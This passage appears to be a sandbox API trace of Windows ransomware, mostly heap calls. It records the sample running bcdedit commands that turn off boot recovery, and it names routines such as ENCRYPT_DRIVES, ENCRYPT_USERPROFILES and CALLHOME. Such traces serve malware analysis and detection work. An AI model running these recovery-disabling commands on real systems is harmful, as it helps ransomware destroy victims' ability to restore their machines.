lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x87f558 | out: lpCommandLine="C:\\Windows\\system32\\cmd.exe /C title 6532368|bcdedit /set {default} recoveryenabled No", lpProcessInformation=0x87f558*(hProcess=0x234, hThread=0x230, dwProcessId=0x5d8, dwThreadId=0x5c0)) returned 1 [0201.668] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8f8398 | out: hHeap=0x8a0000) returned 1 [0201.668] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbca100 | out: hHeap=0x8a0000) returned 1 [0201.668] CloseHandle (hObject=0x230) returned 1 [0201.668] CloseHandle (hObject=0x234) returned 1 [0201.668] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8f7ac8 | out: hHeap=0x8a0000) returned 1 [0201.668] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e2440 | out: hHeap=0x8a0000) returned 1 [0201.668] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bca18 | out: hHeap=0x8a0000) returned 1 [0201.668] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bca00 | out: hHeap=0x8a0000) returned 1 [0201.668] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bc9b8 | out: hHeap=0x8a0000) returned 1 [0201.668] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bc9d0 | out: hHeap=0x8a0000) returned 1 [0201.668] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bc9e8 | out: hHeap=0x8a0000) returned 1 [0201.668] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def60 | out: hHeap=0x8a0000) returned 1 [0201.668] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e2420 | out: hHeap=0x8a0000) returned 1 [0201.668] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db7b0 | out: hHeap=0x8a0000) returned 1 [0201.668] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bc9a0 | out: hHeap=0x8a0000) returned 1 [0201.668] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bc970 | out: hHeap=0x8a0000) returned 1 [0201.668] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e24a0 | out: hHeap=0x8a0000) returned 1 [0201.668] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df2f8 | out: hHeap=0x8a0000) returned 1 [0201.668] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bc940 | out: hHeap=0x8a0000) returned 1 [0201.668] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bc988 | out: hHeap=0x8a0000) returned 1 [0201.668] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded30 | out: hHeap=0x8a0000) returned 1 [0201.669] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e24c0 | out: hHeap=0x8a0000) returned 1 [0201.669] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0f0 | out: hHeap=0x8a0000) returned 1 [0201.669] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bc910 | out: hHeap=0x8a0000) returned 1 [0201.669] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e2430 | out: hHeap=0x8a0000) returned 1 [0201.669] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e24b0 | out: hHeap=0x8a0000) returned 1 [0201.669] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deda8 | out: hHeap=0x8a0000) returned 1 [0201.669] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bc958 | out: hHeap=0x8a0000) returned 1 [0201.669] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bc8e0 | out: hHeap=0x8a0000) returned 1 [0201.669] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bc928 | out: hHeap=0x8a0000) returned 1 [0201.669] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df618 | out: hHeap=0x8a0000) returned 1 [0201.669] PeekMessageW (in: lpMsg=0x87fa74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fa74) returned 0 [0201.669] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e24b0 [0201.669] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bc928 [0201.669] CharUpperBuffW (in: lpsz="_RUNCMD", cchLength=0x7 | out: lpsz="_RUNCMD") returned 0x7 [0201.669] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bc928 | out: hHeap=0x8a0000) returned 1 [0201.669] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e24b0 | out: hHeap=0x8a0000) returned 1 [0201.669] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df618 [0201.669] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e24b0 [0201.669] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deda8 [0201.669] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bc928 [0201.669] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e2430 [0201.669] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0f0 [0201.669] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bc8e0 [0201.670] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e24c0 [0201.670] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e24c0 | out: hHeap=0x8a0000) returned 1 [0201.670] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bc958 [0201.670] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e24c0 [0201.670] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e24c0 | out: hHeap=0x8a0000) returned 1 [0201.670] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bc910 [0201.670] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e24c0 [0201.670] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e24c0 | out: hHeap=0x8a0000) returned 1 [0201.670] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bc8e0 | out: hHeap=0x8a0000) returned 1 [0201.670] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bc958 | out: hHeap=0x8a0000) returned 1 [0201.670] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bc910 | out: hHeap=0x8a0000) returned 1 [0201.670] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0f0 | out: hHeap=0x8a0000) returned 1 [0201.670] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e2430 | out: hHeap=0x8a0000) returned 1 [0201.670] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e2430 [0201.670] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bc910 [0201.670] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e24c0 [0201.670] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bc958 [0201.670] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e24c0 | out: hHeap=0x8a0000) returned 1 [0201.670] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bc8e0 [0201.670] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0f0 [0201.670] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bc988 [0201.670] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e24c0 [0201.671] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bc940 [0201.671] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded30 [0201.671] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bc970 [0201.671] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e24a0 [0201.671] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bc970 | out: hHeap=0x8a0000) returned 1 [0201.671] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df2f8 [0201.671] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bc970 [0201.671] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bc9a0 [0201.671] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db7b0 [0201.671] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0201.671] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e2420 [0201.671] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def60 [0201.671] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bc9e8 [0201.671] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e2440 [0201.671] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e83b8 [0201.671] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e2410 [0201.671] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x87f188, nSize=0x104 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0201.671] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bc9d0 [0201.671] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db7f8 [0201.671] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e2330 [0201.671] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e83b8 | out: hHeap=0x8a0000) returned 1 [0201.671] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e2410 | out: hHeap=0x8a0000) returned 1 [0201.671] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e2410 [0201.671] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x8f3388 [0201.671] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bc9b8 [0201.671] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xa0) returned 0x9c3b98 [0201.671] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db7f8 | out: hHeap=0x8a0000) returned 1 [0201.671] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bc9b8 | out: hHeap=0x8a0000) returned 1 [0201.671] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bc9b8 [0201.672] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bca00 [0201.672] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e23a0 [0201.672] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bca00 | out: hHeap=0x8a0000) returned 1 [0201.672] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e23a0 | out: hHeap=0x8a0000) returned 1 [0201.672] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bc9b8 | out: hHeap=0x8a0000) returned 1 [0201.672] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bc9b8 [0201.672] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bc9b8 | out: hHeap=0x8a0000) returned 1 [0201.672] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bc9b8 [0201.672] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1a0) returned 0x8f7ac8 [0201.672] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c3b98 | out: hHeap=0x8a0000) returned 1 [0201.672] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bc9b8 | out: hHeap=0x8a0000) returned 1 [0201.672] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8f3388 | out: hHeap=0x8a0000) returned 1 [0201.672] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e2410 | out: hHeap=0x8a0000) returned 1 [0201.672] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e2440 | out: hHeap=0x8a0000) returned 1 [0201.672] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bc9b8 [0201.672] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e2440 [0201.672] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bca00 [0201.672] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e2440 | out: hHeap=0x8a0000) returned 1 [0201.672] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bca18 [0201.672] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e2440 [0201.672] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e83b8 [0201.672] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e2410 [0201.672] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e83b8 | out: hHeap=0x8a0000) returned 1 [0201.672] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e2410 | out: hHeap=0x8a0000) returned 1 [0201.672] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e2440 | out: hHeap=0x8a0000) returned 1 [0201.672] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xce) returned 0x8c0a60 [0201.672] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x2) returned 0x8e2440 [0201.672] GetCurrentDirectoryW (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x14 [0201.672] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x2a) returned 0xbca100 [0201.672] GetCurrentDirectoryW (in: nBufferLength=0x14, lpBuffer=0xbca100 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0201.673] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="C:\\Windows\\system32\\cmd.exe /C title 2495304|bcdedit /set {default} bootstatuspolicy ignoreallfailures", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x0, lpEnvironment=0x0, lpCurrentDirectory="C:\\Windows\\system32", lpStartupInfo=0x87f590*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x87f558 | out: lpCommandLine="C:\\Windows\\system32\\cmd.exe /C title 2495304|bcdedit /set {default} bootstatuspolicy ignoreallfailures", lpProcessInformation=0x87f558*(hProcess=0x230, hThread=0x234, dwProcessId=0x5cc, dwThreadId=0x5d4)) returned 1 [0201.677] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8c0a60 | out: hHeap=0x8a0000) returned 1 [0201.677] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbca100 | out: hHeap=0x8a0000) returned 1 [0201.677] CloseHandle (hObject=0x234) returned 1 [0201.677] CloseHandle (hObject=0x230) returned 1 [0201.678] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8f7ac8 | out: hHeap=0x8a0000) returned 1 [0201.678] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e2330 | out: hHeap=0x8a0000) returned 1 [0201.678] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bc9d0 | out: hHeap=0x8a0000) returned 1 [0201.678] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bc9e8 | out: hHeap=0x8a0000) returned 1 [0201.678] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bca00 | out: hHeap=0x8a0000) returned 1 [0201.678] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bc9b8 | out: hHeap=0x8a0000) returned 1 [0201.678] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bca18 | out: hHeap=0x8a0000) returned 1 [0201.678] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def60 | out: hHeap=0x8a0000) returned 1 [0201.678] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e2420 | out: hHeap=0x8a0000) returned 1 [0201.678] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db7b0 | out: hHeap=0x8a0000) returned 1 [0201.678] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bc940 | out: hHeap=0x8a0000) returned 1 [0201.678] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bc988 | out: hHeap=0x8a0000) returned 1 [0201.678] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e24c0 | out: hHeap=0x8a0000) returned 1 [0201.678] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0f0 | out: hHeap=0x8a0000) returned 1 [0201.678] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bc9a0 | out: hHeap=0x8a0000) returned 1 [0201.678] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bc970 | out: hHeap=0x8a0000) returned 1 [0201.678] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df2f8 | out: hHeap=0x8a0000) returned 1 [0201.678] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e24a0 | out: hHeap=0x8a0000) returned 1 [0201.678] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded30 | out: hHeap=0x8a0000) returned 1 [0201.678] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bc8e0 | out: hHeap=0x8a0000) returned 1 [0201.678] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e24b0 | out: hHeap=0x8a0000) returned 1 [0201.678] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e2430 | out: hHeap=0x8a0000) returned 1 [0201.678] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df618 | out: hHeap=0x8a0000) returned 1 [0201.678] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bc928 | out: hHeap=0x8a0000) returned 1 [0201.678] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bc958 | out: hHeap=0x8a0000) returned 1 [0201.678] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bc910 | out: hHeap=0x8a0000) returned 1 [0201.678] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deda8 | out: hHeap=0x8a0000) returned 1 [0201.678] PeekMessageW (in: lpMsg=0x87fa74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fa74) returned 0 [0201.678] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db060 | out: hHeap=0x8a0000) returned 1 [0201.679] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9cd0 | out: hHeap=0x8a0000) returned 1 [0201.679] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9d90 | out: hHeap=0x8a0000) returned 1 [0201.679] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19e0 | out: hHeap=0x8a0000) returned 1 [0201.679] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2b8 | out: hHeap=0x8a0000) returned 1 [0201.679] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2d0 | out: hHeap=0x8a0000) returned 1 [0201.679] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1860 | out: hHeap=0x8a0000) returned 1 [0201.679] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90ab20 | out: hHeap=0x8a0000) returned 1 [0201.679] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1910 | out: hHeap=0x8a0000) returned 1 [0201.679] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a78 | out: hHeap=0x8a0000) returned 1 [0201.679] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9aa8 | out: hHeap=0x8a0000) returned 1 [0201.679] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1950 | out: hHeap=0x8a0000) returned 1 [0201.679] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de100 | out: hHeap=0x8a0000) returned 1 [0201.679] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba060 | out: hHeap=0x8a0000) returned 1 [0201.679] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba108 | out: hHeap=0x8a0000) returned 1 [0201.679] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de808 | out: hHeap=0x8a0000) returned 1 [0201.679] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a60 | out: hHeap=0x8a0000) returned 1 [0201.679] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de1f0 | out: hHeap=0x8a0000) returned 1 [0201.679] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b80 | out: hHeap=0x8a0000) returned 1 [0201.679] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e7398 | out: hHeap=0x8a0000) returned 1 [0201.679] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18a0 | out: hHeap=0x8a0000) returned 1 [0201.679] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba450 | out: hHeap=0x8a0000) returned 1 [0201.680] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba648 | out: hHeap=0x8a0000) returned 1 [0201.680] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf348 | out: hHeap=0x8a0000) returned 1 [0201.680] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18d0 | out: hHeap=0x8a0000) returned 1 [0201.680] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba630 | out: hHeap=0x8a0000) returned 1 [0201.680] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3c0 | out: hHeap=0x8a0000) returned 1 [0201.680] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deab0 | out: hHeap=0x8a0000) returned 1 [0201.680] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ab0 | out: hHeap=0x8a0000) returned 1 [0201.680] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba090 | out: hHeap=0x8a0000) returned 1 [0201.680] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba438 | out: hHeap=0x8a0000) returned 1 [0201.680] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3a8 | out: hHeap=0x8a0000) returned 1 [0201.680] PeekMessageW (in: lpMsg=0x87fccc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fccc) returned 0 [0201.680] PeekMessageW (in: lpMsg=0x87fccc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fccc) returned 0 [0201.680] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e2520 [0201.680] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de948 [0201.681] CharUpperBuffW (in: lpsz="START_THE_SHOW", cchLength=0xe | out: lpsz="START_THE_SHOW") returned 0xe [0201.681] PeekMessageW (in: lpMsg=0x87fccc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fccc) returned 0 [0201.681] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e2520 [0201.681] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de948 [0201.681] CharUpperBuffW (in: lpsz="ENCRYPT_DRIVES", cchLength=0xe | out: lpsz="ENCRYPT_DRIVES") returned 0xe [0201.681] PeekMessageW (in: lpMsg=0x87fccc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fccc) returned 0 [0201.681] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e2520 [0201.681] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de948 [0201.681] CharUpperBuffW (in: lpsz="DECRYPT_DRIVES", cchLength=0xe | out: lpsz="DECRYPT_DRIVES") returned 0xe [0201.681] PeekMessageW (in: lpMsg=0x87fccc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fccc) returned 0 [0201.681] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e2520 [0201.681] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf348 [0201.681] CharUpperBuffW (in: lpsz="ENCRYPT_USERPROFILES", cchLength=0x14 | out: lpsz="ENCRYPT_USERPROFILES") returned 0x14 [0201.681] PeekMessageW (in: lpMsg=0x87fccc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fccc) returned 0 [0201.681] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e2520 [0201.681] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf348 [0201.681] CharUpperBuffW (in: lpsz="DECRYPT_USERPROFILES", cchLength=0x14 | out: lpsz="DECRYPT_USERPROFILES") returned 0x14 [0201.681] PeekMessageW (in: lpMsg=0x87fccc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fccc) returned 0 [0201.681] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e2520 [0201.681] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de948 [0201.681] CharUpperBuffW (in: lpsz="CALLHOME", cchLength=0x8 | out: lpsz="CALLHOME") returned 0x8 [0201.681] PeekMessageW (in: lpMsg=0x87fa74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fa74) returned 0 [0201.681] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e2520 [0201.681] RtlAllocateHeap 